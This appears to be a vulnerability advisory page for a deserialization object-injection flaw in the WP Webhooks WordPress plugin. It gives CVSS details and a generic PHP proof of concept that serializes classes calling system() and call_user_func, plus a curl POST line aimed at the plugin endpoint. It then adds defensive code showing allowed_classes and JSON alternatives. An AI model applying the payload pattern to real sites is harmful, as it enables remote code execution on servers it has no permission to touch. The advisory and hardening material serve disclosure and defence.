Deserialization of Untrusted Data vulnerability in Cozmoslabs WP Webhooks (wp-webhooks) allows Object Injection. This issue affects WP Webhooks: from n/a through 3.3.8 (<= 3.3.8).
CVSS Details
CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
WP Webhooks <= 3.3.8
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```php
<?php
/**
 * CVE-2025-66073 PoC - WP Webhooks Object Injection
 * Affected: WP Webhooks <= 3.3.8
 * Vulnerability: Deserialization of Untrusted Data
 *
 * This PoC demonstrates how to construct a malicious payload for object injection.
 * The actual exploitation requires a suitable POP chain in the target environment.
 */

// Example malicious serialized object structure
class MaliciousPayload {
    public $cmd;

    function __construct() {
        $this->cmd = 'whoami'; // Command to execute
    }

    function __destruct() {
        // This magic method runs when the object is destroyed (e.g. at the end
        // of the request that unserialized it), not at unserialize() time itself.
        // In a real attack, this would be part of a POP chain.
        // Note: it also fires in this generator script when $maliciousObject
        // goes out of scope.
        system($this->cmd);
    }
}

// Generate malicious serialized payload
$maliciousObject = new MaliciousPayload();
$payload = serialize($maliciousObject);

// Alternative: Using known POP chain gadgets (example)
class GadgetChain {
    public $callback;

    function __wakeup() {
        // __wakeup() is invoked by unserialize() as soon as the object is rebuilt.
        if (isset($this->callback)) {
            call_user_func($this->callback);
        }
    }
}

// Construct the attack payload for HTTP POST request
$attackPayload = serialize(new GadgetChain());
$attackPayload = base64_encode($attackPayload);

echo "Malicious Payload (base64):\n";
echo $attackPayload . "\n\n";
echo "Usage: Send this payload via POST to WP Webhooks endpoint\n";
echo "Example: curl -X POST 'https://target.com/wp-json/wp-webhooks/v1/...' -d 'data=" . $attackPayload . "'\n";
?>
```
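The PoC above only shows the attacker's side. What a maintainer or reviewer needs is the defensive counterpart: the difference between calling `unserialize()` on client-supplied data and the two safe alternatives. The following is an added example written for this page; it is not code from the CVE record or from the WP Webhooks plugin, and the class `HookRunner`, the function names, and the constructed input are hypothetical stand-ins chosen so that the side effect is a flag rather than a command.

```php
<?php
/**
 * Added example (not part of the CVE record or the WP Webhooks plugin).
 * Shows why unserialize() on attacker-controlled input is dangerous and
 * what the hardened alternatives look like. Class, function and payload
 * names here are hypothetical.
 */

// Stand-in for any application class with a magic method. In a real
// deployment the risk comes from classes already loaded in the target
// (the "POP chain" the PoC refers to); here the side effect is only a flag.
class HookRunner {
    public $hook;
    public static $triggered = false;

    public function __wakeup() {
        // Runs automatically when unserialize() rebuilds this object.
        self::$triggered = true;
    }
}

// Constructed input: a serialized blob as a client could submit it.
// Built locally so the example runs offline.
$untrusted = serialize(new HookRunner());

// 1. Vulnerable pattern: any class reachable by the autoloader can be
//    instantiated and its __wakeup()/__destruct() methods run.
function unsafe_decode(string $blob) {
    return unserialize($blob);
}

// 2. Hardened pattern: allowed_classes => false (PHP 7.0+) rebuilds every
//    object as __PHP_Incomplete_Class, so no magic method of the original
//    class is ever executed.
function safe_decode(string $blob) {
    return unserialize($blob, ['allowed_classes' => false]);
}

// 3. Preferred pattern: do not use PHP serialization for external data at
//    all. JSON carries no object-instantiation semantics.
function json_decode_strict(string $blob): array {
    $data = json_decode($blob, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('expected a JSON object');
    }
    return $data;
}

// Demonstrate the difference on the same constructed blob.
HookRunner::$triggered = false;
$obj = unsafe_decode($untrusted);
printf("unsafe: class=%s triggered=%s\n",
    get_class($obj), var_export(HookRunner::$triggered, true));

HookRunner::$triggered = false;
$obj = safe_decode($untrusted);
printf("safe:   class=%s triggered=%s\n",
    get_class($obj), var_export(HookRunner::$triggered, true));

// Constructed JSON input for the preferred path.
$cfg = json_decode_strict('{"hook":"post_published","url":"https://example.invalid/hook"}');
printf("json:   hook=%s\n", $cfg['hook']);
```

Run with `php example.php`: the first call instantiates `HookRunner` and sets the flag, the second returns a `__PHP_Incomplete_Class` object with the flag untouched, and the third never creates an object at all. For code review, the check to add is simple: any `unserialize()` whose argument can be traced back to a request body, webhook payload, cookie or database column written from user input needs either the `allowed_classes` option or replacement by `json_decode()`.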